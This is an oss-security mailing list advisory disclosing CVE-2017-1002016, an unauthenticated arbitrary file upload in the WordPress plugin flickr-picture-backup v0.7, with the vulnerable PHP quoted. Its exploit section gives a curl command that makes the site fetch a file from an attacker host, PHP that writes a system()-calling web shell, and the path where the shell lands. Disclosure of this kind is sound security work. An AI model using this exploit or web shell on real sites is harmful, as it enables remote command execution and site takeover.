oss-security - Arbitrary file upload vulnerability in Wordpress plugin flickr-picture-backup v0.7

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [day] [month] [year] [list]

Date: Sun, 30 Apr 2017 12:45:47 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Arbitrary file upload vulnerability in Wordpress plugin
 flickr-picture-backup v0.7

Title: Arbitrary file upload vulnerability in Wordpress plugin flickr-picture-backup v0.7
Author: Larry W. Cashdollar, @_larry0
Date: 2017-04-26
CVE-ID:[CVE-2017-1002016]
Download Site: https://wordpress.org/plugins/flickr-picture-backup/
Vendor: http://daozhao.goflytoday.com/
Vendor Notified: 2017-04-26
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=190
Description: Backup flickr’s picture which in page/post External links to flickr’s picture. 
Vulnerability:
The code in flickr-picture-download.php doesn't check to see if the user is authenticated or that they have permission to upload files.  It also doesn't check what type of file is being uploaded.

define('WP_ADMIN', TRUE);
require_once('../../../wp-load.php');
require_once(ABSPATH . 'wp-admin/includes/admin.php');
//require_once("./flickr-picture-backup.php");
//echo "flickr-picture-download.php";
if($_GET["url"])
{
    $url = $_GET["url"];
    $fl = wp_daozhao_download_flickr_picture($url);
    if ( is_wp_error($fl) )
    {
		echo  "FALSE:" . $fl->get_error_message();
    }
    else
    {
        wp_daozhao_flickr_backupfile_exists($url,$returl);
        echo "OK:" . $returl ;
    }
    //echo wp_daozhao_flickr_backup_urlpath();
    //echo "OK";
}

Export: JSON TEXT XML
Exploit Code:
	• $ curl http://example.com/wp-content/plugins/flickr-picture-backup/flickr-picture-download.php -d "url=http://myhost/shell.php"
	•  
	• Where shell.php is code to print out php web shell code, something like:
	•  
	• <?php
	• echo "<?php\n\$cmd=\$_GET['cmd'];\nsystem(\$cmd);\n?>\n";
	• ?>
	•  
	• Upon exploitation your shell is in:
	•  
	• http://example.com/wp-content/uploads/flickr_backup/shell.php

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.